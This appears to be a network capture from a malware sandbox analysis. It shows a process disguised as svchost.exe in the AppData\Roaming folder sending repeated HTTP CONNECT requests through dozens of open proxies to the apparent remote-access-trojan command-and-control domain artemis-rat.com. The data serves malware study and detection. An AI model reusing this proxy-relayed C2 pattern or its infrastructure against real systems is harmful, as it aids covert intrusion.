Mar 9, 2024 13:14:38.215871096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.561077118 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3709	192.168.2.5	61815	46.17.63.166	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.215986967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3710	192.168.2.5	61813	34.95.243.122	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.233091116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3711	192.168.2.5	61308	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.235837936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3712	192.168.2.5	61880	162.223.94.166	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.274961948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3713	192.168.2.5	61883	184.170.248.5	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.278984070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3714	192.168.2.5	61825	117.30.118.200	8118	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.284507036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3715	192.168.2.5	61853	193.239.58.92	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.288505077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3716	192.168.2.5	58633	51.75.126.150	19693	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.294075012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3717	192.168.2.5	61967	43.153.175.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.296029091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3718	192.168.2.5	61969	43.153.175.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.296878099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3719	192.168.2.5	61970	43.153.175.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.299602985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3720	192.168.2.5	61972	43.153.175.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.300992966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3721	192.168.2.5	61821	103.49.114.195	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.305802107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3722	192.168.2.5	61906	104.19.85.214	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.306858063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.461416960 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3723	192.168.2.5	61876	18.135.133.116	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.326004028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.617099047 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:38 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:38.618149996 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ad 43 11 60 25 09 dc c2 8e a8 6f ca 6c b7 37 f1 71 ea 87 90 0d 59 6d f4 49 4c b7 ae 6c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRC`%ol7qYmILl*,+0/$#('=<5/Uartemis-rat.com#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3724	192.168.2.5	61865	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.326498985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3725	192.168.2.5	61864	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.342140913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3726	192.168.2.5	61653	117.160.250.134	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.352312088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3727	192.168.2.5	58812	135.148.10.161	60415	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.375518084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3728	192.168.2.5	61856	102.132.201.202	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.410258055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3729	192.168.2.5	61608	42.61.48.219	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.412471056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3730	192.168.2.5	61944	43.153.22.29	10005	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.421684027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.592870951 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:38.592909098 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3731	192.168.2.5	61873	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.430948019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3732	192.168.2.5	60618	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.456794977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3733	192.168.2.5	61901	128.140.26.12	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.461050034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.770378113 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.2 Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3734	192.168.2.5	61725	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.462946892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3735	192.168.2.5	61974	104.21.194.19	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.465908051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.620454073 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3736	192.168.2.5	61924	46.17.63.166	9480	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.499603987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3737	192.168.2.5	61922	52.16.232.164	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.504873037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.815154076 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:38 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3738	192.168.2.5	61890	103.163.51.254	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.517728090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3739	192.168.2.5	62009	104.16.106.65	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.524108887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.678124905 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3740	192.168.2.5	61903	13.234.24.116	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.535777092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3741	192.168.2.5	62020	104.25.230.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.541217089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.695501089 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3742	192.168.2.5	62028	104.19.225.70	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.547743082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.701947927 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3743	192.168.2.5	62029	172.67.181.136	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.548767090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.703216076 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:38 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3744	192.168.2.5	62014	52.13.248.29	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.574240923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.767256975 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:38 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3745	192.168.2.5	62054	104.20.233.70	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:38.582847118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
